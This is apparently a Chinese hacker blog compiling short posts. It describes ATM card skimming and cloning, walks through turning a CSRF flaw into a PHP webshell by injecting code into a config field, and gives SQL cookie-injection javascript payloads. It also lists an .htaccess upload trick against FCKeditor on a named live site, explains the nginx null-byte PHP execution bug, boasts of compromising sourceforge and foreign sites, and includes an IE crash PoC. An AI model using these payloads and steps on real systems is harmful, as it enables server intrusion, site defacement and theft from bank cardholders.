无意看到新闻说道银半夜凉初透行卡复制的器材,其实这是真实存在的。这个技术几年前就玩过,用酒店房卡复制成银半夜凉初透行卡在ATM机上取钱(没干坏事)。下面这个新闻视频中,那个男子在ATM安装设备,是类似读卡器的,用于记录银半夜凉初透行卡磁条信息。只需将磁卡采集器安装在银行柜员机磁卡入口处,卡插入后账户资料就被读取,同时,装到柜员机上的摄像头盗取对方密码,然后将采集到的账户资料在电脑上输出,复制在卡上。接着,就可以用复制卡到任意一台ATM机提取别人的钱了。
安全提示:复制卡能否取走你的钱,关键在于密码,因此提醒市民:看好你的卡,更要管好你的密码。提款、消费时多个遮掩手势,会大大减少卡被“克隆”的可能。
火车头采集器远程溢出0DAY,别的版本不清楚,我测试火车头采集器7.2最新版。
溢出这个词,是魔王装B加上去的。不过一个采集软件能出一个远程0DAY。也不简单。
小心站长开启采集器的时候,个人电脑被黑哦。
漏洞针对的是800端口。有兴趣自己研究。
在2次开发某个程序,情不自禁就有点手贱,看看这个程序的漏洞。一不小心就挖出了他的CSRF 的ODAY,
然后后台要拿SHELL。没上传,有数据库功能。找到个网站提交链接的地方,如图。
插入小马到库里。通过备份到PHP。
PHP 的文件是生成了。可惜是GZ 压缩的数据库文件,代码都不能执行。
本来以为就这样了。找了下其他代码。貌似还能插入马。有个配置文件是写入文件的。没写入数据库。
$log_dir = 'log'; 这样的闭合不了。插入进去' 会给程序转义成\'。
$word_upper_bound = 100; 找到一个没'的。只要闭合前后,就行了。
这个地方的代码,限制了输入值是3字符.插不进内容。
<td><input name="_word_upper_bound" type="text" value=
"<?php print $word_upper_bound;?>" id="word_upper_bound" size="5"
maxlength="3"></td>
用FOX的插件,修改表单到30。如下图
我们的插入代码的效果。
$word_upper_bound = 100;插入小马;
然后,就菜刀连接。HOHO~~
如何判断cookies注入
javascript:alert(document.cookie="参数= "+escape("参数值 and 1=1"));self.open("http://+"document.location.host+document.location.pathname);void(0);
javascript:alert(document.cookie="参数="+escape("参数值 and 1=2"));self.open("http://+"document.location.host+document.location.pathname);void(0);
漏洞描述:利用.htaccess文件来执行php脚本。
利用步骤:
1.创建一个htaccess文件:
代码内容:
<FilesMatch “_php.gif”>
SetHandler application/x-httpd-php
</FilesMatch>
2.实用编辑器上传htaccess文件.
http://26836659.blogcn.com/FCKeditor/editor/filemanager/upload/test.html
http://26836659.blogcn.com/FCKeditor/editor/filemanager/browser/default/connectors/test.html
3.上传shell.php.gif
4.上传后shell.php.gif, 会自动被改名为 shell_php.gif
5.访问http://26836659.blogcn.com/上传目录/shell_php.gif
Nginx %00空字节执行任意代码(php)漏洞
nginx 0.5.* nginx 0.6.* nginx 0.7 <= 0.7.65 nginx 0.8 <= 0.8.37
Possible Arbitrary Code Execution with Null Bytes, PHP, and Old Versions of nginx
Ngnix在遇到%00空字节时与后端FastCGI处理不一致,导致可以在图片中嵌入PHP代码然后通过访问xxx.jpg%00.php来执行其中的代码
In vulnerable versions of nginx, null bytes are allowed in URIs by default
(their presence is indicated via a variable named zero_in_uri defined in ngx_http_request.h).
Individual modules have the ability to opt-out of handling URIs with null bytes.
However, not all of them do; in particular, the FastCGI module does not.
hacking PR9 websites in sourceforege.net .lol~v~
sourceforege.net PR9. Alexa的排名185 .
内核太新了。没虾米办法。可以操作数据库。PR9。我挂外联可以吧。
这下让我装B了。
一直在默默的日外国站,发点牢骚。
1.经常都是遇到PHP+MYSQL 构造。数据分离。
2.后台基本没有。MYSQL.FTP,基本不对外,只有80 对外。偶尔遇到SSH。还是采用密钥链接。
3.独立的上传的图片服务器。(拿得SHELL也困死在图片服务器上。)
4.基本都是LINUX最新内核,提权难。
5.拿到SHELL后 到处都是 0644 。CMD SHELL 还反弹不回来。
<html><head>
<style type="text/css">
#a {
margin:0 10px 10px;
}
#b {
width:100%;
}
</style>
<title>IE Crasher</title>
</head>
<body>
<table><tr><td>
<div id="a">
<form id="b">
<input type="text" name="test"/>
</div>
</td><td width="1"></td></tr></table>
</body></html>
然后用Internet Explorer打开它
